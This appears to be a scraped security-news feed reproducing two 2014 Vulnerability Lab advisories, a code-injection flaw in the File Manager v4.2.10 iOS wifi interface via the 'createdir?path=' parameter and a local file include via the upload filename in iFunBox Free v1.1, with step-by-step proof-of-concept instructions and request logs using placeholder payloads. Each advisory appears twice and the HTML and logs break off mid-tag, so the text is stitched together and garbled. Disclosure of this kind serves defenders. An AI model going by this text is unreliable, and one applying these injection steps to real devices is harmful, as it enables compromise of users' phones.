I would like to share the scripts and tools with you which I used during my presentation on Hacktivity and now on hack.lu here..........http://finspy.marosi.hu/tools-for-finspy/
↧
Tools for FinSpy
↧
File Manager v4.2.10 iOS - Code Execution Vulnerability
Document Title:
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1343
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick(
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer"
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
==============================
1343
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==============================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick(
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer"
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
↧
↧
iFunBox Free v1.1 iOS - File Include Vulnerability
Document Title:
===============
iFunBox Free v1.1 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-20
Vulnerability Laboratory ID (VL-ID):
==============================
1344
Common Vulnerability Scoring System:
==============================
6.4
Product & Service Introduction:
==============================
iFunBox is a powerful file transfer and manage tool. You can use it to transfer files between Apple devices.
It’s also a full-function file explorer, with user-friendly UI and simple operations.
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official iFunBox Free v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==============================
2014-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nguyen Anh
Product: iFunBox Free - iOS Mobile Web Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
==============================
A local file include web vulnerability has been discovered in the official iFunBox Free v1.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the index dir listing of the wifi interface context. The attacker is able to inject the local file include request by usage of the `wifi
interface` in connection with the vulnerable upload request.
Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload (File)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] iToolZip Wifi Interface (localhost:80000)
Proof of Concept (PoC):
=======================
The local file include vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the right top corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:8000)
4. Now, the attacker uploads a file and tampers the request to manipulate the session information live
Note: He injects a payload to request a local file through the vulnerable filename value in the upload POSt emthod request
5. The code execution occurs in the inject in the wifi file dir listing web interface index (localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png)
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<div id="main">
<div id="header">
<form action="/files" enctype="multipart/form-data" method="post" class="upload">
<label>Select file:</label>
<input id="newfile" name="newfile" size="40" type="file">
<input name="commit" value="Upload" class="button" type="submit">
</form></div><table border="0" cellpadding="0" cellspacing="0"><thead>
<tr><th>Name</th><th class="del">Download</th><th class="del">Delete</th></tr></
<tbody id="filelist"><tr><td><a class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td><
<input onclick=downloadPath('%3C./[
<td class='del'><input onclick=deletePath('%3C./[
value="Delete" class='button' /></td></tr></tbody></table></
<td class="del"></td><td class="del"></td></tr><tr><td>
<tr class="shadow"><td><a onclick="loadPath('Games')" class="file">Games</a></td><td class="del"></td><td class="del"></td></tr><tr><td>
class="file">Musics</a></td><
<td class="del"></td><td class="del"></td></tr><tr><td>
--- PoC Session Logs [GET] ---
Status: 302[Found]
POST http://localhost:8000:8000/
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
POST-Daten:
POST_DATA[--------------------
Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8000:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[5753] Mime Type[application/x-unknown-
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[5753]
Date[Sun, 19 Oct 2014 17:05:59 GMT]
-
Status: 200[OK]
GET http://localhost:8000:8000/
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
X-Requested-With[
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[369]
Date[Sun, 19 Oct 2014 17:06:00 GMT]
-
Status: 200[OK]
GET http://localhost:8000:8000/./[
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sun, 19 Oct 2014 17:06:01 GMT]
Solution - Fix & Patch:
=======================
The file include web vulnerability can be patched by a secure parse and encode of the filename in the upload POST method request.
To prevent the execution filter the input and restrict it on input but encode also the iToolZip wifi interface file dir list with the vulnerable name output value.
Security Risk:
==============
The security risk of the local file include web vulnerability in the iToolZo wifi web interface is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
===============
iFunBox Free v1.1 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Release Date:
=============
2014-10-20
Vulnerability Laboratory ID (VL-ID):
==============================
1344
Common Vulnerability Scoring System:
==============================
6.4
Product & Service Introduction:
==============================
iFunBox is a powerful file transfer and manage tool. You can use it to transfer files between Apple devices.
It’s also a full-function file explorer, with user-friendly UI and simple operations.
(Copy of the Homepage: https://itunes.apple.com/de/
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official iFunBox Free v1.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==============================
2014-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nguyen Anh
Product: iFunBox Free - iOS Mobile Web Application 1.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
==============================
A local file include web vulnerability has been discovered in the official iFunBox Free v1.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the index dir listing of the wifi interface context. The attacker is able to inject the local file include request by usage of the `wifi
interface` in connection with the vulnerable upload request.
Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload (File)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] iToolZip Wifi Interface (localhost:80000)
Proof of Concept (PoC):
=======================
The local file include vulnerability can be exploited by local attackers without user interaction or privileged application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/
2. Start the app and push in the right top corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:8000)
4. Now, the attacker uploads a file and tampers the request to manipulate the session information live
Note: He injects a payload to request a local file through the vulnerable filename value in the upload POSt emthod request
5. The code execution occurs in the inject in the wifi file dir listing web interface index (localhost:8000:8000/./[LOCAL FILE INCLUDE VULNERABILITY!].png)
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<div id="main">
<div id="header">
<form action="/files" enctype="multipart/form-data" method="post" class="upload">
<label>Select file:</label>
<input id="newfile" name="newfile" size="40" type="file">
<input name="commit" value="Upload" class="button" type="submit">
</form></div><table border="0" cellpadding="0" cellspacing="0"><thead>
<tr><th>Name</th><th class="del">Download</th><th class="del">Delete</th></tr></
<tbody id="filelist"><tr><td><a class="file"><./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td><
<input onclick=downloadPath('%3C./[
<td class='del'><input onclick=deletePath('%3C./[
value="Delete" class='button' /></td></tr></tbody></table></
<td class="del"></td><td class="del"></td></tr><tr><td>
<tr class="shadow"><td><a onclick="loadPath('Games')" class="file">Games</a></td><td class="del"></td><td class="del"></td></tr><tr><td>
class="file">Musics</a></td><
<td class="del"></td><td class="del"></td></tr><tr><td>
--- PoC Session Logs [GET] ---
Status: 302[Found]
POST http://localhost:8000:8000/
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
POST-Daten:
POST_DATA[--------------------
Content-Disposition: form-data; name="newfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8000:8000/ Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[5753] Mime Type[application/x-unknown-
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[5753]
Date[Sun, 19 Oct 2014 17:05:59 GMT]
-
Status: 200[OK]
GET http://localhost:8000:8000/
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*]
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
X-Requested-With[
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[369]
Date[Sun, 19 Oct 2014 17:06:00 GMT]
-
Status: 200[OK]
GET http://localhost:8000:8000/./[
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/
Accept-Language[de,en-US;q=0.
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000:
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Sun, 19 Oct 2014 17:06:01 GMT]
Solution - Fix & Patch:
=======================
The file include web vulnerability can be patched by a secure parse and encode of the filename in the upload POST method request.
To prevent the execution filter the input and restrict it on input but encode also the iToolZip wifi interface file dir list with the vulnerable name output value.
Security Risk:
==============
The security risk of the local file include web vulnerability in the iToolZo wifi web interface is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
↧
Vulnerabilities in WordPress Database Manager v2.7.1
